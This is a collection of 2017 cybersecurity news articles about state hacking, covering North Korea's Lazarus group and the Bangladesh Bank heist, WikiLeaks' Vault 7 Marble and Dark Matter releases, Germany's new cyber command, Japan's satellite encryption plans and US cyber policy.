“We’re sure they’ll come back soon. In all, attacks like the ones conducted by Lazarus group show that a minor misconfiguration may result in a major security breach, which can potentially cost a targeted business hundreds of millions of dollars in loss,” said Vitaly Kamluk, head of the Global Research and Analysis Team APAC at Kaspersky Lab. “We hope that chief executives from banks, casinos and investment companies around the world will become wary of the name Lazarus.”

North Korea Cyber Attack Attribution

While Kaspersky Lab did not officially accuse North Korea as being behind the attacks, the firm did display a strong case against the Hermit State. "This is the first time we have seen a direct link between Bluenoroff and North Korea," the company said. "Their activity spans from backdoors to watering hole attacks, and attacks on SWIFT servers in banks of South East Asia and Bangladesh Central Bank. Now, is it North Korea behind all the Bluenoroff attacks after all? As researchers, we prefer to provide facts rather than speculations. Still, seeing IP in the C2 log, does make North Korea a key part of the Lazarus Bluenoroff equation."

In a presentation at the Security Analyst Summit, Kamluk said that, while unlikely, another group could have invested a huge amount of money to frame North Korea. He also speculated that a third force could be involved to help North Korea from the outside.

Kaspersky has published a detailed report (PDF), which includes infiltration methods, their relation to attacks on SWIFT software, and insights on attribution. The report also includes Indicators of Compromise (IOC) and other data to help defenders detect possible Lazarus-related activity in their networks. They also produced a short video summarizing the activity of the group.

 


Japan plans to develop a hack-proof satellite system
3.4.2017 securityaffairs BigBrothers

Japan plan to develop a hack proof satellite system to protect transmissions between satellites and ground stations with a dynamic encryption of data.
Japan’s Internal Affairs and Communications Ministry plans to develop a communications system to protect satellites from cyber attacks.

The hack proof satellite system will protect transmissions between satellites and ground stations implementing a dynamic encryption of data.

“With the proposed plan, the government aims to establish a secure communications network that is unique to Japan, for domestic security purposes and to spur investment in the private-sector aerospace industry.” reported the Watertown Daily Times.

The ambitious project of a hack proof satellite system is led by the National Institute of Information and Communications Technology under the jurisdiction of the ministry, it will involve government, industry and academic institutions. The goal is to propose the system for commercial purposes in five to 10 years, the communications ministry aims to have an advantage in the industry by developing a secure communications system that operates in the private sector (i.e. Companies, organizations) will be able to use at a low cost.

The final decision on the hack proof satellite system will be taken this summer, funds for its activities will be included in the budget plan for fiscal 2018.

Cyber attacks represent a serious threat to satellite communications, satellites have a crucial role in our digital society, almost every industry is benefiting from their services for this reason their security is a pillar of the cyber security strategy of governments worldwide.

Attackers are posing a growing challenge to satellite operators, more exposed are commercial satellites that lack the level of security for the military. Security researchers are warning about possible effects of a successful attack against satellite systems and are urging to building them with a security by design approach.

Satellites communicate with terrestrial base stations using radio waves, hackers can intercept with unpredictable consequences.

Hackers who can decode the encrypted data can steal information, manipulate it or take the control of the satellite.

Governments consider realistic the threat of a cyber attack launched by a nation-state actor, a criminal organization and even by a lone hacker. The principal concerns are related to the operation conducted by Chinese hackers, likely state-sponsored attackers, that in the past have already breached the security of US satellites.

hack proof satellite system

In August, the Chinese government launched the world’s first quantum satellite, which will help it establish “hack-proof” communications between space and the ground.

Alleged state-sponsored hackers interfered with the operations of two U.S. government satellites in 2007 and 2008 obtaining access through a ground station in Norway. The satellites were used for climate monitoring.

The hackers “achieved all steps required to command” the Terra AM-1 satellite, but did not control it. An attacker with command privileges could “deny or degrade as well as forges or otherwise manipulate the satellite’s transmission,” or simply damage or otherwise destroy the satellite.

The project of the Japanese Government is to install a code generator on satellites so they can dynamically encrypt data.

“The dynamic codes will be sent to the ground base station using light beams. As the encryption is dynamic, it is more difficult for hackers to decode data even if they are able to intercept transmissions.” continues the Water Town daily Times.

The code generator is a small cube (approximately 10 centimeters on each side) that could be easily installed on a micro satellite being developed by a start-up firm, which is approximately 30-40 centimeters on each side.


German Military to Launch the Bundeswehr’s new Cyber and Information Space Command
2.4.2017 securityaffairs  BigBrothers

Today the German Military is going to launch a cyber command, the Bundeswehr’s new Cyber and Information Space (CIR) Command.
Today the German Military is going to launch a cyber command, the Bundeswehr’s new Cyber and Information Space (CIR) Command, a structure that is considered strategic for the defence of the country from cyber attacks.

According to the new commander, Lieutenant General Ludwig Leinhos, Germany is taking a leading role among the members of the NATO alliance.

“Leinhos said the main tasks would be to operate and protect the military’s own IT infrastructure and computer-assisted weapons systems, as well as surveillance of online threats.” reported the Reuters agency.

The German Government intends to protect its critical infrastructure and its assets from cyber attacks. The German military fears cyber espionage and sabotage.

The Bundeswehr’s new Cyber and Information Space (CIR) Command, will be composed of 260 IT specialists, but the Government plans to increase its staff up to 13,500 military and civilian personnel by July.

The General Ludwig Leinhos confirmed that the centre will be tasked to develop offensive cyber capabilities.

“He said the centre would also develop and war-game offensive capabilities because “in order to be able to defend yourself, you have to know the options for attack”.” continues the Reuters.

The operations conducted by the Cyber and Information Space (CIR) Command would have to be approved by the German Parliament, this means that cyber operations are considered equal to conventional military missions.

The creation of the centre is the response to the numerous attacks suffered by the German Government, last year the Bundestag was hit by numerous attacks.


In June, German media reported that Bundestag may need to replace 20,000 computers after hackers breached the Bundestag systems.

According to the Der Spiegel magazine, security experts involved in the investigation on the attack against the Bundestag suspect that the hack was part of a large-scale espionage campaign conducted by Russians state-sponsored hackers.

The German defense ministry said that in the first nine weeks of 2017, the IT systems of the Bundeswehr had been hit by more than 280,000 attacks.

“we are in a constant race between the development of attack options and defensive capabilities” concluded Leinhos.


WikiLeaks Reveals the Marble framework, used by the CIA to make hard the attribution
2.4.2017 securityaffairs BigBrothers

WikiLeaks has published the third batch of documents dubbed Marble that revealed the CIA anti-forensics tool dubbed Marble framework.
WikiLeaks released the third batch of the CIA Vault7 archive that shed light the anti-forensics tools used by the intelligence Agency,

The first tranche of CIA documents from Vault7 was related to hacking tools and techniques, while the second batch included detailed info about hacking tools specifically designed to hack SmartTV, Android handhelds, Apple iPhones, Macs and Windows systems.

This third lot of documents, dubbed Mable, includes the source code files for the anti-forensic Marble Framework. It contains 676 source code files of a secret anti-forensic Marble Framework.

The experts from the CIA have developed the Marble Framework to make hard forensics activities on its malicious codes.

The code used by the CIA was able to evade detection implementing various techniques, for example, it is able to detect if the code runs in virtual machine sandbox.

The Marble platform makes hard the attribution of the attacks, the documents show how CIA can conduct a cyber attack in a way experts attributed it to other countries, including Russia, China, North Korea and Iran.

“Today, March 31st 2017, WikiLeaks releases Vault 7 “Marble” — 676 source code files for the CIA’s secret anti-forensic Marble Framework. Marble is used to hamper forensic investigators and anti-virus companies from attributing viruses, trojans and hacking attacks to the CIA.” reads Wikileaks.

“Marble does this by hiding (“obfuscating”) text fragments used in CIA malware from visual inspection. This is the digital equivallent of a specalized CIA tool to place covers over the english language text on U.S. produced weapons systems before giving them to insurgents secretly backed by the CIA.”

Marble framework wikileaks

The CIA Marble Framework platform includes algorithms to insert into the malware source code multiple strings in various languages to make hard the attribution. Using such kind of techniques malware authors try to trick victims into believing that the malware was developed by American/English Vxers.

“The source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi.” continues Wikileaks. “This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, but there are other possibilities, such as hiding fake error messages.”

Marble Framework does not contain any vulnerabilities or exploits.

The Marble dump also includes a deobfuscator to reverse CIA text obfuscation, using it experts can identify patterns of attacks conducted by the CIA and attribute previous hacking attacks and malicious codes to the Agency. Marble was in use at the CIA during 2016, in 2015 the cyber spies were using the 1.0 version.


WikiLeaks Reveals 'Marble' Source Code that CIA Used to Frame Russia and China
1.4.2017 thehackernews BigBrothers
cia-marble-framework-malware-source-code-obfuscator
WikiLeaks published hundreds of more files from the Vault 7 series today which, it claims, show how CIA can mask its hacking attacks to make it look like it came from other countries, including Russia, China, North Korea and Iran.
Dubbed "Marble," the part 3 of CIA files contains 676 source code files of a secret anti-forensic Marble Framework, which is basically an obfuscator or a packer used to hide the true source of CIA malware.
The CIA's Marble Framework tool includes a variety of different algorithm with foreign language text intentionally inserted into the malware source code to fool security analysts and falsely attribute attacks to the wrong nation.
The leaked files indicate that the Marble's source code includes Chinese, Russian, Korean, Arabic and Farsi languages, as well as English, which shows that the CIA has engaged in clever hacking games.
"Marble is used to hamper[ing] forensic investigators and anti-virus companies from attributing viruses, trojans and hacking attacks to the CIA," says the whistleblowing site.
"...for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion," WikiLeaks explains.
The released source code archive also contains a deobfuscator to reverse CIA text obfuscation.

Since the Marble framework has now been made public, forensic investigators and anti-virus firms would be able to connect patterns and missing dots in order to reveal wrongly attributed previous cyber attacks and viruses.
So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for and security bugs in popular hardware and software, and the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs.
While WikiLeaks suggests that Marble was in use as recently as 2016, the organization does not provide any evidence to back this claim. Experts are still analyzing the Marble release, so there's no need to get too excited at this moment.
The White House has condemned the revelations made by Wikileaks, saying that those responsible for leaking classified information from the agency should be held accountable by the law.


German Military to Launch Cyber Command

1.4.2017 securityweek  BigBrothers

Germany's armed forces Saturday launch a cyber command, with a status equal to that of the army, navy and air force, meant to shield its IT and weapons systems from attack.

Military planners fear that wars of the future will start with cyber attacks against critical infrastructure and networks, extensive online espionage and sabotage. The Bundeswehr's new Cyber and Information Space (CIR) Command, based in the former West German capital of Bonn, will start off with 260 IT specialists but grow to 13,500 military and civilian personnel by July.

With the new digital force, Germany is taking a leading role among NATO allies, its new commander, Lieutenant General Ludwig Leinhos, told news weekly Focus.

Leinhos said the main tasks would be to operate and protect the military's own IT infrastructure and computer-assisted weapons systems, as well as surveillance of online threats.

He said the centre would also develop and war-game offensive capabilities because "in order to be able to defend yourself, you have to know the options for attack".

However, any full-scale cyber attacks abroad would have to be approved by the German parliament, just like any other military mission.

The security of national and government IT systems, meanwhile, remains the responsibility of the interior ministry which oversees the domestic security agency that handles counterespionage.

The German government has been sensitized to cyber security since the parliament was attacked last year, with security sources suspecting Russian hackers behind the attack.

Defense Minister Ursula von der Leyen had announced the creation of the cyber command two years ago to protect the military from increasing numbers of online attacks.

The defense ministry said that in this year's first nine weeks alone, the IT systems of the Bundeswehr had been targeted more than 280,000 times.

Leinhos said that "we are in a constant race between the development of attack options and defensive capabilities".


WikiLeaks Releases CIA Tool Used to Impede Malware Attribution

31.3.2017 securityweek BigBrothers
WikiLeaks has released information and source code for a framework allegedly used by the U.S. Central Intelligence Agency (CIA) to make analysis of its tools and attribution more difficult.

The whistleblower organization on Friday made public 676 source code files of the Marble Framework. According to WikiLeaks, version 1.0 of the framework was released in 2015, and the CIA has continued using it during 2016.

Files that appear to be part of the official Marble Framework documentation describe it as a framework “designed to allow for flexible and easy-to-use obfuscation when developing tools.” These types of techniques have been used by many malware developers to hinder researchers.

The first round of Vault 7 files released by WikiLeaks showed that the CIA learned from the NSA’s mistakes after the intelligence agency’s Equation Group was exposed by security researchers. CIA employees apparently determined that the use of custom cryptography was one of the NSA’s biggest mistakes, as it allowed researchers to link different pieces of malware to the same developer.

The Marble framework allows obfuscation of a tool using a random technique to prevent forensics investigators and security vendors from linking it to a specific developer. Marble users can also select the algorithm they want to use or configure the application to omit certain algorithms.

Charles R. Smith, CEO of Softwar Inc, pointed out that Marble leverages the Bouncy Castle cryptography APIs.

During its analysis of the Marble source code, WikiLeaks identified test examples written in Chinese, Russian, Korean, Arabic and Farsi, which suggests that the agency may have used the framework to trick investigators into believing that its tools were developed by individuals speaking one of these languages.

CIA obfuscation tool source code

“This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion,” WikiLeaks said. “But there are other possibilities, such as hiding fake error messages.”

The source code files made available by WikiLeaks also include a deobfuscation tool.

WikiLeaks has offered to share the exploits it has obtained with tech firms, but many companies have not agreed to the organization’s conditions. U.S. officials also hinted that using the leaked information could have legal repercussions.

While the available information has led to the discovery of some zero-day vulnerabilities, cybersecurity vendors and other tech companies determined that many of the flaws have already been patched. Last week, WikiLeaks published files focusing on Mac and iPhone exploits, but Apple claimed most of the security holes had been addressed.

The CIA has refused to comment on the authenticity of the leaked documents. However, the agency pointed out that its mission is to collect intelligence from overseas entities, and claimed that it does not spy on individuals in the U.S.


FBI Chief's Secret Twitter Account Outed?

31.3.2017 securityweek BigBrothers
When Federal Bureau of Investigation Director James Comey teased that he had joined the world of social media with secret Facebook and Twitter accounts, tech writer Ashley Feinberg took the dare.

After four hours of FBI-level sleuthing, she was pretty sure she had the answer: On both he was using the name of US Protestant theologian Reinhold Niebuhr. Embarrassing: He had only one Twitter follower.

All it took, Feinberg said on the Gizmodo website where she is a senior reporter, was for Comey to tell an audience of security professionals Wednesday night that he had very cautiously joined the social networking age to keep up with family.

"I care deeply about privacy, treasure it. I have an Instagram account with nine followers. Nobody is getting in. They're all immediate relatives, and one daughter's serious boyfriend," Comey let slip.

Feinberg was piqued. "Who am I to say no to a challenge?" she wrote. She tracked down Comey's family members, eventually discovering his son Brien's Instagram account by way of a photo of him with an Instagram tag.

That led to a potential dead end: A protected account which she could not view.

But when she asked to be invited by Brien Comey to view his account, Instagram popped up with offers to follow other accounts that included Brien's mother and a mysterious "Reinhold Niebuhr," who had just nine followers.

And a Google check easily showed that Niebuhr was the subject of James Comey's 1982 university thesis.

The FBI chief, who carries the mammoth political burden of investigating the Trump administration's suspected links to Russia as both political parties eye him suspiciously, unsurprisingly also had a protected account.

But from there to Twitter was easy. Feinberg found seven Niebuhrs there, but only one with secretive identity: @projectexile7. That was the name of a program to battle gun-related crime that Comey helped develop.

That account had no tweets in three years, and followed only 27 other accounts. But those were reporters who cover the FBI, and law enforcement-related accounts. And Donald Trump.

And the one follower was a prominent expert in national security law and a friend of Comey's. Bingo.

So much for secrecy. The FBI had no comment late Thursday, but the Twitter-verse was convinced. Hours after Feinberg's report, Comey had more than 8,000 followers. Pretty good for never tweeting.


President Donald Trump is going to extend by one year the Executive Order 13694
31.3.2017 securityaffairs BigBrothers

US President Trump is extending by one year special powers introduced by President Obama with the Executive Order 13694 on cyber security.
The US President Donald Trump intends to extend by one year the Executive Order 13694 that gives the US Governments special powers to issue sanctions against people and organizations engaged in significant cyberattacks and cybercrime against the U.S.

The Executive Order 13694 was introduced by former President Barack Obama on April 1, 2015, and was due to expire next Saturday. President Trump sent a letter to Congress yesterday informing it of his decision to keep it active the Order.

“Significant malicious cyber-enabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States, continue to pose an unusual and extraordinary threat to the national security, foreign policy, and economy of the United States,” Trump wrote in the letter. “Therefore, I have determined that it is necessary to continue the national emergency declared in Executive Order 13694 with respect to significant malicious cyber-enabled activities.”

The executive order gave the U.S. new powers to retaliate for hacking against the critical infrastructure, political institutions, and US organizations.

Due to the attacks on the 2016 Presidential election, the US Government expanded the executive order in December 2016 to include voting systems and US political parties.

In December, the Order was used to sanction Russian agents and organizations for their alleged role in the cyber attacks on the Presidential Election.

The US ejected 35 Russian intelligence operatives from the United States and imposed sanctions on nine entities and individuals.

The Russians individuals ejected by the US Government are working out of the Russia’s consulate in San Francisco and the Russian embassy in Washington.

According to a White House fact sheet issued on the executive order, the individuals due to the “harassment of our diplomatic personnel in Russia by security personnel and police.”

Executive Order 13694 Trump

The US Government sanctioned the Russian intelligence services, the GRU (Russian Main Intelligence Directorate) and the FSB (Federal Security Service), four GRU officers, and three other organizations. The actions are the Obama administration’s response to a Russian hacking and disinformation campaign used to interfere in the American election process.

The order was issued concurrently a report from US intelligence that confirms the cyber attacks against the 2015 Presidential election aimed to influence the results of the vote.

The decision to extend the existing executive order is one of the first actions the Trump Administration has taken to approach cyber security issues.

One of the issues explicitly requested in the order is a close collaboration between the Department of Commerce and Department of Defense aimed at the protection of the critical infrastructure.


US Senate Just Voted to Let ISPs Sell Your Web Browsing Data Without Permission
24.3.2017 thehackernews BigBrothers
senate-internet-service-provider-sell-browser-history
The ISPs can now sell certain sensitive data like your browsing history without permission, thanks to the US Senate.
The US Senate on Wednesday voted, with 50 Republicans for it and 48 Democrats against, to roll back a set of broadband privacy regulations passed by the Federal Communication Commission (FCC) last year when it was under Democratic leadership.
In October, the Federal Communications Commission ruled that ISPs would need to get consumers' explicit consent before being allowed to sell their web browsing data to the advertisers or other big data companies.
Before the new rules could take effect on March 2, the President Trump's newly appointed FCC chairman Ajit Pai temporarily put a hold on these new privacy rules.
Ajit Pai argued that the rules, which are regulated by FTC, unfairly favored companies like Google, Twitter, and Facebook, who have the ability to collect more data than ISPs and thus dominate digital advertising.
"All actors in the online space should be subject to the same rules, and the federal government shouldn’t favor one set of companies over another," FCC said in a statement.
"Therefore, he has advocated returning to a technology-neutral privacy framework for the online world and harmonizing the FCC’s privacy rules for broadband providers with the FTC’s standards for others in the digital economy."
Pai wanted that the FCC and the FTC should treat all online entities the same way. So those new privacy policies should be scrapped.
If the latest decision gets approval from the House of Representatives and signed by President Trump, this will make it easier for ISPs like Verizon, Comcast, and AT&T, to earn more money by collecting and selling data on what you buy, where you browse, and what you search for your home, all without taking your consent.
Since the Senate used the Congressional Review Act (CRA) to overturn the privacy rules, if the repeal is passed, it would not only roll back the FCC's privacy rules but also prevent the regulatory body from making similar privacy regulations in the future if the.
Not surprisingly, the broadband industry applauded the FCC's move, calling it "a welcome recognition that consumers benefit most when privacy protections are consistently applied throughout the Internet ecosystem."
But, of course, privacy advocates are not at all happy with the voting, arguing that the Senate has put ISPs profits over users’ privacy.


US blames North Korea for the $81 million Bangladesh cyber heist
24.3.2017 securityaffairs BigBrothers

US federal prosecutors speculate the involvement of North Korea in the cyber heist of $81 million from Bangladesh’s account at the New York Federal Reserve Bank.
The news was reported by The Wall Street Journal, prosecutors suspect the involvement of Chinese middlemen who helped the Government of Pyongyang to organize the cyber theft.

In February 2016, unknown hackers transferred the funds from the Bangladesh’s account at the New York Federal Reserve Bank to accounts in the Philippines through the SWIFT system.

In reality, the hackers attemted to steal much more, they tried to complete dozens of transfers for an overall amount of $850 million.

The disaster was avoided by accident because the bank’s security systems and typos in some requests allowed the identification of the theft attempts, investigators discovered that hackers failed 35 transfer attempts.

“$81 million was transferred from the Federal Reserve Bank to Filipino accounts while attempts to claim $850 million were foiled by the Federal Reserve Bank’s security system,” Razee Hassan, deputy governor of Bangladesh Bank, told AFP.

“Attempts to transfer money to Sri Lanka by the hackers were foiled as their transfer requests contained typos,” he added.

The hackers exploited gaps in communication between banks at weekends, the operation started on a Friday because the Bangladesh Bank is closed, on the following days, Saturday and Sunday, the Fed Bank in New York was being closed.

North Korea suspected Federal reserve New York hack

The choice of the Philippines as the landing country for the bank transfers was not casual, banks were also closed on the Monday due to the Chinese New Year.

A top police investigator in Dhaka told Reuters in December that some Bangladesh Bank officials deliberately exposed its computer systems allowing hackers to penetrate the systems.

The Justice Department and the New York Fed declined to comment on the report.

The suspect of the involvement of the North Korea behind the cyber heist is not a novelty

“The U.S. Federal Bureau of Investigation believes that North Korea is responsible for the heist, an official briefed on the probe told Reuters. Richard Ledgett, deputy director of the U.S. National Security Agency, publicly suggested on Tuesday that North Korea may be linked to the incident, while private firms have long pointed the finger at the reclusive state.” reported the Reuters Agency.

Security experts at Symantec linked the attacks against banks worldwide to the Lazarus APT group which is believed to be a nation state actor.

In June 2016, evidence collected by a senior security researcher from Anomali Labs linked the malware to the North Korean hacker crew known as Lazarus Group.

The expert discovered that five additional strains of malware that suggested the involvement of the Lazarus Group in the cyber attacks that targeted the banks.

The researchers at Symantec discovered that the hacking tools used by the gang share many similarities with the malicious code in the arsenal of the Lazarus APT.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

“Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam.” reads the analysis published by Symantec last year.

The experts at Symantec have spotted at least three strains of malware, Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee, which have been used in targeted attacks against financial institutions.

“Symantec has identified three pieces of malware which were being used in limited targeted attacks against the financial industry in South-East Asia: Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee.” states Symantec”At first, it was unclear what the motivation behind these attacks were, however code sharing between Trojan.Banswift (used in the Bangladesh attack used to manipulate SWIFT transactions) and early variants of Backdoor.Contopee provided a connection.”

The expert Aaron Shelmire from Anomali Labs supported this thesis with his investigation.

“Five new additional pieces of malware code discovered that contain unique portions of code related to the SWIFT attacks. ” wrote Shelmire.

The Anomali Labs team conducted deeper research into a very large malware data repository using a set of Yara signature below to search for the shared subroutines.

North Korea Lazarus group investigation Anomali Labs

The experts discovered five additional pieces of malware containing portions of code shared by Lazarus Group’s strains of malware, including the one used in the several SWIFT attacks, according to Shelmire.

Last week, SWIFT announced it planned to cut off the remaining North Korean banks still connected to its system as concerns about the North Korean nuclear program and missile tests conducted by Pyongyang.

The U.S. Treasury is considering sanctions against the alleged Chinese middlemen who facilitated the cyber heist.

The New York Fed and SWIFT declined to comment.


Vault7 Dark Matter batch – CIA has been targeting the iPhone supply chain since at least 2008
24.3.2017 securityaffairs BigBrothers

Wikileaks released the second bash of CIA’s Vault 7 dump, it contains other precious documents to understand the way CIA was hacking systems worldwide.
The Wikileaks Vault 7 dump will make for a long time the headlines, the organization has just released another lot of classified documents related the hacking tools and techniques and exploit codes used by the CIA cyber spies to hack Apple MacBook and iOS devices.

Wikileaks dubbed this batch of information as ‘Dark Matter,’ it includes five documents on Mac and iPhone hacks developed by the CIA.

Dark Matter Vault7

This is the second bash of Vault 7 released by WikiLeaks after the whistleblower organization released the first one on March 7.

The hacking tools and techniques were devised by CIA unit, called Embedded Development Branch (EDB).

“Today, March 23rd 2017, WikiLeaks releases Vault 7 ‘Dark Matter’, which contains documentation for several CIA projects that infect Apple Mac Computer firmware (meaning the infection persists even if the operating system is re-installed) developed by the CIA’s Embedded Development Branch (EDB). These documents explain the techniques used by CIA to gain ‘persistence’ on Apple Mac devices, including Macs and iPhones and demonstrate their use of EFI/UEFI and firmware malware.” reads the Dark Matter description provided by Wikileaks.

The CIA experts have found a way to infect Apple firmware to gain persistence, in this way the attackers were able to maintain the infection on Mac OS and iOS devices even if the operating system has been re-installed.

According to WikiLeaks, one of the most interesting documents is related to the “Sonic Screwdriver” project, which is a “mechanism for executing code on peripheral devices while a Mac laptop or desktop is booting”allowing an attacker to boot its attack software for example from a USB stick “even when a firmware password is enabled”.

The technique allows a local attacker to boot its hacking tool using a peripheral device (i.e. USB stick, screwdriver),“even when a firmware password is enabled” on the device. This implied that the Sonic Screwdriver allows attackers to modify the read-only memory of a device, the documents revealed that malware is stored in the Apple Thunderbolt-to-Ethernet adapter.

Digging in the Dark Matter dump we can find the NightSkies 1.2 hacking tool, which is described as a “beacon/loader/implant tool” for the Apple iPhone.

“Also included in this release is the manual for the CIA’s “NightSkies 1.2” a “beacon/loader/implant tool” for the Apple iPhone. Noteworthy is that NightSkies had reached 1.2 by 2008, and is expressly designed to be physically installed onto factory fresh iPhones. i.e the CIA has been infecting the iPhone supply chain of its targets since at least 2008.” continues Wikileaks.

This hacking tool has expressly been designed by the CIA hackers to infect “factory fresh” iPhones, likely during transport. The existence of the tool suggests that the Central Intelligence Agency has been targeting the iPhone supply chain since at least 2008.

“While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization’s supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise,” says WikiLeaks.

“DarkSeaSkies” is another implant described in the Dark Matter repository. It is described as “an implant that persists in the EFI firmware of an Apple MacBook Air computer” and consists of “DarkMatter”, “SeaPea” and “NightSkies”, respectively EFI, kernel-space and user-space implants.

Wikileaks plans to release more interesting information about the CIA cyber capabilities and hacking techniques.


WikiLeaks Releases Data on CIA's Apple Hacking Tools

24.3.2017 securityweek BigBrothers
CIA Apple hacking tools

WikiLeaks has released a new round of Vault 7 files. The latest dump, dubbed “Dark Matter,” details some of the tools allegedly used by the CIA to target Apple devices.

The tools are named Sonic Screwdriver, Der Starke, Triton, DarkSeaSkies, NightSkies and SeaPea and, based on the descriptions provided in the files made available by WikiLeaks, they can be used to spy on iPhones and Mac computers. However, in most cases, deploying them requires physical access to the targeted device.

Sonic Screwdriver, for instance, is a tool that can be used to execute code from a USB thumb drive or other external disk connected to a Mac laptop even if the firmware is protected by a password. The documents obtained by WikiLeaks show that Sonic Screwdriver is stored on the firmware of a Thunderbolt-to-Ethernet adapter.

The DarkSeaSkies implant is designed for targeting the EFI on MacBook Air computers, and it’s meant to be delivered via “a supply chain intercept or a gift to the target.” DarkSeaSkies relies on the DarkMatter EFI driver for persistence and installing other tools, and the SeaPea OS X rootkit for stealth and execution of other implants. One such implant is NightSkies, which provides command and control capabilities.

The documents show DarkSeaSkies can be installed by booting the targeted system with an external flash drive. The implant is persistent across OS upgrades and reinstalls, but it can be removed by the attacker using a special command. Under certain conditions, the implant may also remove itself automatically.

Another set of tools includes a piece of OS X malware dubbed Triton, its infector Dark Mallet, and Der Starke, the EFI-persistent version of Triton.

One version of the NightSkies tool is designed for targeting iPhones. Once installed on a device, it can be used to execute arbitrary commands, download additional tools to the phone, and steal various types of files, including the address book, SMS messages and call logs. NightSkies, which also requires physical access to the targeted device, is recommended for “factory fresh” devices.

The documents are dated 2008, 2009 and 2012, but WikiLeaks claims other Vault7 files show the CIA has continued to improve these tools. The organization also pointed out that the files show the intelligence agency has been “infecting the iPhone supply chain of its targets since at least 2008.”

“While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization's supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise,” WikiLeaks said.

Impact of the tools and risks

The first Vault7 dump summarized the CIA’s alleged hacking capabilities, and appeared to show that the agency is capable of spying on or through a wide range of devices. While actual exploits have not been published, the information that was made public did not describe any sophisticated tools and many of the vulnerabilities had already been addressed.

In the case of the Dark Matter dump, the fact that the Apple implants require physical access to devices makes them less dangerous. Nicholas Weaver, a researcher at the International Computer Science Institute of the University of California, Berkeley, pointed out, “if somebody has physical access to your computer, you can’t call it yours anymore.”

As for WikiLeaks’ supply chain claims, Weaver and others believe the organization’s statement may be misleading.

“Installing onto ‘factory fresh’ is not about interdiction but targeted delivery: the CIA asset gives the target a phone or a MacBook, this is the general extent of the ‘supply chain’ the CIA is concerned with,” Weaver told SecurityWeek via email.

“Interdiction in the ‘supply chain’ works very well for things like routers, which are big, expensive, few in number, shipped from the US, and to known customers,” he explained. “For example, a Cisco router sent to Syria. Basically you have to know that ‘his package is being shipped from location I can control to known target’ in order to intercept and sabotage.”

Weaver continued, “It doesn’t work for something you can buy at a local store or which is drop-shipped from a local warehouse in the country where it’s going to be used from any of a gazillion different vendors. The CIA doesn’t have a fleet of agents in foreign post offices that can grab such a package. And you don’t mass-poison (say at the factory) this way, for THAT you would have to sabotage the machine that programs up all the iPhones in the first place.”

On the other hand, Weaver pointed out that the WikiLeaks files reveal some interesting information about the CIA’s human intelligence (HUMINT) capabilities.

“At least one tool was specifically because the asset could give the target a MacBook Air, indicating that the target was very trusted by the asset,” the expert said. “Likewise, the two tools together which allow one to reflash firmware even when the EFI password was set says that the CIA had a case where a paranoid target had his computer with a very low level password in the firmware, and the asset would have access to the computer for a short period of time and needed to reflash the computer.”


Exclusive: Wikileaks reveals CIA's Apple MacOS and iPhone Hacking Techniques
23.3.2017 thehackernews BigBrothers
As part of its "Vault 7" series, Wikileaks — the popular whistle-blowing platform — has just released another batch of classified documents focused on exploits and hacking techniques the Central Intelligence Agency (CIA) designed to target Apple MacOS and iOS devices.
Dubbed "Dark Matter," the leak uncovers macOS vulnerabilities and attack vectors developed by a special division of the CIA called Embedded Development Branch (EDB) – the same branch that created ‘Weeping Angel’ attack – and focused specifically on hacking Mac and iOS firmware.
CIA Developed Unremovable Mac OS and iPhone Malware
The newly released documents revealed that CIA had also been targeting the iPhone since 2008.
The Agency has created a malware that is specially designed to infect Apple firmware in a way that the infection remains active on MacOS and iOS devices even if the operating system has been re-installed.
According to Wikileaks, the released documents also gives a clear insight into "the techniques used by the CIA to gain 'persistence' on Apple Mac devices, including Macs and iPhones and demonstrate their use of EFI/UEFI and firmware malware."
Project Sonic Screwdriver: Infect Devices via USB
One of the documents from 2012 reveals details about the "Sonic Screwdriver" project, which according to the CIA, is a "mechanism for executing code on peripheral devices while a Mac laptop or desktop is booting."
This technique may allow hackers to deliver malware from a peripheral device – such as a USB stick or a screwdriver – "even when a firmware password is enabled" on the device, which means the read-only memory of a device can be modified using Sonic Screwdriver.
The malware is stored in the Apple Thunderbolt-to-Ethernet adapter, claims WikiLeaks.
The NightSkies Implants: iPhone's Supply Chain Attack
Another document in the latest release consists of a manual for the CIA's "NightSkies 1.2," which is described as a "beacon/loader/implant tool" for the Apple iPhone.
What's noteworthy is that the first version of this iPhone hacking tool is operational since 2007, which has expressly been designed to infect "factory fresh" iPhones in the supply chain.
"While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization's supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise," says WikiLeaks.
CIA's Dark Matter leak is the second batch of Vault 7 released by WikiLeaks, after the whistleblower organization released the first part of an unprecedentedly large archive of CIA-related classified documents on March 7.
Previously published Vault 7 leak outlined a broad range of security bugs in software and devices, including iPhones, Android phones, and Samsung TVs, which millions of people around the world rely on, to intercept communications and spy on its targets.
Expect to see more revelations about the government and Intelligence agencies from the WikiLeaks in coming days as part of its Year Zero series.


US Suspects North Korea in $81 Million Bangladesh Theft: Report

23.3.2017 securityweek BigBrothers
US federal prosecutors suspect the North Korean government directed last year's theft of $81 million from Bangladesh's account at the New York Federal Reserve Bank, according to a media report Wednesday.
